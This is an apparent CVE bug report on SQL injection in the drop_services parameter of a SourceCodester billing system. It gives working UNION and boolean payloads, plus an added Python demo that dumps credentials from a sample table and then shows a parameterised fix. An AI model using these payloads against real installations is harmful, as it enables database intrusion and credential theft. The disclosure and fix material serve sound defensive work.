CVE-2023-2595: bug_report/SQLi-1.md at main · Yastar/bug_report
A vulnerability has been found in SourceCodester Billing Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file ajax_service.php of the component POST Parameter Handler. The manipulation of the argument drop_services leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228397 was assigned to this vulnerability.
Billing Management System v1.0 has SQL injection
BUG_Author:yastar
Website source code address: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html
Vulnerability File: /smartbilling_source_code/ajax_service.php
The POST parameter `drop_services` is vulnerable to SQL injection: its value is placed directly into an SQL query, as the two payloads below show.
Payload1: drop_services=-1' union all select null,null,null,null,concat(0x616263,0x2526272829),null,null,null,null-- -
Payload2: drop_services=1' and 999=999 and 'h'='h
The boolean condition in Payload2 evaluates to true and the page renders normally, which confirms that the injected SQL is executed by the database (Payload1 reaches a nine-column UNION, so the original query returns nine columns).
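The following is an added example and is not part of the original bug report or of the SourceCodester code base. It reproduces the two payloads above against a stand-alone SQLite model of the lookup, side by side with a parameterised version of the same query. The real query in ajax_service.php is not shown on the page; the example assumes a lookup of the form `SELECT * FROM services WHERE id='<drop_services>'` over a nine-column table (nine, so that the page's UNION payload lines up), and the `services`/`users` schema and rows are constructed sample data. Because SQLite has no MySQL-style `concat()` or `0x...` literals, Payload1's marker is written as a plain string literal here.

```python
import sqlite3

# Constructed sample schema and data (not from the real application).
# Nine columns in `services` so the page's nine-column UNION payload matches.
SCHEMA = """
CREATE TABLE services (
    id INTEGER PRIMARY KEY, name TEXT, description TEXT, price REAL,
    category TEXT, status TEXT, created_by TEXT, created_at TEXT, updated_at TEXT
);
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO services VALUES
    (1, 'Hosting', 'Monthly hosting', 9.99, 'web', 'active', 'admin', '2023-01-01', '2023-01-01');
INSERT INTO users VALUES (1, 'admin', 'secret');
"""


def open_db():
    """Return an in-memory SQLite database populated with the sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, drop_services):
    """Assumed shape of the flawed query: the POST value is concatenated into SQL."""
    sql = "SELECT * FROM services WHERE id='" + drop_services + "'"
    return conn.execute(sql).fetchall()


def hardened_lookup(conn, drop_services):
    """Same query with a bound parameter: the value can never change the SQL grammar."""
    sql = "SELECT * FROM services WHERE id=?"
    return conn.execute(sql, (drop_services,)).fetchall()


# Payload1 from the report, adapted to SQLite: concat(0x616263, ...) becomes 'abc'.
# The leading -1' closes the quoted id so the first SELECT returns nothing, the UNION
# appends the attacker-controlled row, and "-- -" comments out the trailing quote.
UNION_PAYLOAD = "-1' union all select null,null,null,null,'abc',null,null,null,null-- -"

# Payload2 from the report (true condition) and its false counterpart used as an oracle.
TRUE_PAYLOAD = "1' and 999=999 and 'h'='h"
FALSE_PAYLOAD = "1' and 999=998 and 'h'='h"

# A UNION that reads a different table; this is what the marker payload is a probe for.
EXFIL_PAYLOAD = ("-1' union all select null,null,null,null,username||':'||password,"
                 "null,null,null,null from users-- -")


def responses_differ(conn, lookup, payload_true, payload_false):
    """Boolean-based check: an injectable endpoint answers the two payloads differently."""
    return lookup(conn, payload_true) != lookup(conn, payload_false)


def union_marker(conn, lookup, payload=UNION_PAYLOAD):
    """Return the injected marker from column 5 if the UNION row comes back, else None."""
    rows = lookup(conn, payload)
    return rows[0][4] if len(rows) == 1 and rows[0][0] is None else None


if __name__ == "__main__":
    db = open_db()
    print("vulnerable, Payload1 marker:", union_marker(db, vulnerable_lookup))
    print("vulnerable, Payload2 oracle:", responses_differ(db, vulnerable_lookup, TRUE_PAYLOAD, FALSE_PAYLOAD))
    print("vulnerable, users table:   ", union_marker(db, vulnerable_lookup, EXFIL_PAYLOAD))
    print("hardened,   Payload1 marker:", union_marker(db, hardened_lookup))
    print("hardened,   Payload2 oracle:", responses_differ(db, hardened_lookup, TRUE_PAYLOAD, FALSE_PAYLOAD))
```

With string concatenation the marker `abc` comes back in column 5, the true/false pair produces different result sets (one row versus none), and the same UNION shape reads `admin:secret` out of `users`; with the bound parameter every payload is compared literally against `id` and returns nothing, so the oracle no longer distinguishes the two conditions. The fix for ajax_service.php is the same: bind `drop_services` with `mysqli_prepare`/PDO rather than interpolating it.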